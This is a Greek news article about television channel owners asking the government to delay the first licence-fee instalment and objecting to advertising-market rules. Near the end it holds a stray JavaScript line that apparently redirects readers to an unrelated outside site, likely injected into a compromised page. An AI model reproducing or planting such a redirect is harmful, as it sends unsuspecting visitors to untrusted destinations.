Αιφνίδιο αίτημα καναλαρχών: Να πληρώσουμε αργότερα την 1η δόση

0
11

Πρόταση να μην πληρωθεί η πρώτη δόση έως τις 16 Σεπτεμβρίου, όπως προβλέπει το καταστατικό για τη διαδικασία του διαγωνισμού των τηλεοπτικών αδειών, έκαναν στον Γενικό Γραμματέα Ενημέρωσης Λευτέρη Κρέτσο οι εκπρόσωποι των υπερθεματιστών στη συνάντησή τους.

Μετά το πέρας της συνάντησης, ο διευθύνων σύμβουλος του τηλεοπτικού σταθμού ΣΚΑΙ Κώστας Κιμπουρόπουλος ανακοίνωσε πως οι εκπρόσωποι των νέων καναλαρχών ζήτησαν να αναβληθεί η καταβολή της πρώτης δόσης για την αγορά των αδειών, διότι στις 16 Σεπτεμβρίου θα συζητηθεί στο Ανώτατο Δικαστήριο αίτηση ασφαλιστικών μέτρων υποψηφίων εναντίον συνυποψηφίων τους. Ο νομικός σύμβουλος του κ. Καλογρίτσα ειδικότερα ζήτησε να καθυστερήσει για τουλάχιστον είκοσι ημέρες η έκδοση της κατακυρωτικής πράξης με τους νικητές του διαγωνισμού, διότι το δικαστήριο ενδέχεται -όπως είπε- να ακυρώσει κάποια συμμετοχή. Η κυβέρνηση επιφυλάχτηκε να απαντήσει.

Οι εκπρόσωποι των νέων καναλαρχών εξέφρασαν, ακόμη, σοβαρές επιφυλάξεις για το σχέδιο της κυβέρνησης για τη διαφημιστική αγορά. η οποία στο εξής θα τεθεί υπό κρατικό έλεγχο και, μάλιστα, με επιπλέον κόστος για τα λειτουργούντα κανάλια που αγγίζει το 10% του συνολικού τζίρου. Όπως τονίζουν τα κανάλια, το πλαίσιο αυτό σε συνδυασμό με τα υψηλά τιμήματα για την απόκτηση της άδειας, καθιστά αμφίβολη την βιωσιμότητα των συγκεκριμένων επιχειρήσεων, αν όχι αδύνατη. Και για τον λόγο αυτό ζητούν τροποποίηση του νόμου.

Ταυτόχρονα και οι τέσσερις εταιρείες, ζήτησαν να αποσαφηνιστεί πόσες τελικώς θα είναι οι τηλεοπτικές άδειες που θα δοθούν στο μέλλον (πανελλαδικές, θεματικές και περιφερειακές) κι αν αυτές θα δημιουργήσουν συνθήκες αθέμιτου ανταγωνισμού προς τις εταιρείες που κατοχύρωσαν πανελλαδικές άδειες γενικού περιεχομένου. Και οι τέσσερις εταιρείες ζήτησαν  από την κυβέρνηση να δεσμευθεί δημοσίως για το ζήτημα.

Επίσης τα κανάλια, με επικεφαλής τον ΣΚΑΪ και τον ΑΝΤΕΝΝΑ, ζήτησαν να υπογραφούν συμβάσεις του δημοσίου με τον κάθε υπερθεματιστή ξεχωριστά, όπου θα αναφέρονται όχι μόνο οι υποχρεώσεις κάθε εταιρείας, αλλά και οι υποχρεώσεις του δημοσίου απέναντί τους, έτσι ώστε, όπως χαρακτηριστικά είπαν “να είναι σαφείς και ξεκάθαροι εξ αρχής οι όροι του παιχνιδιού”.

 

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here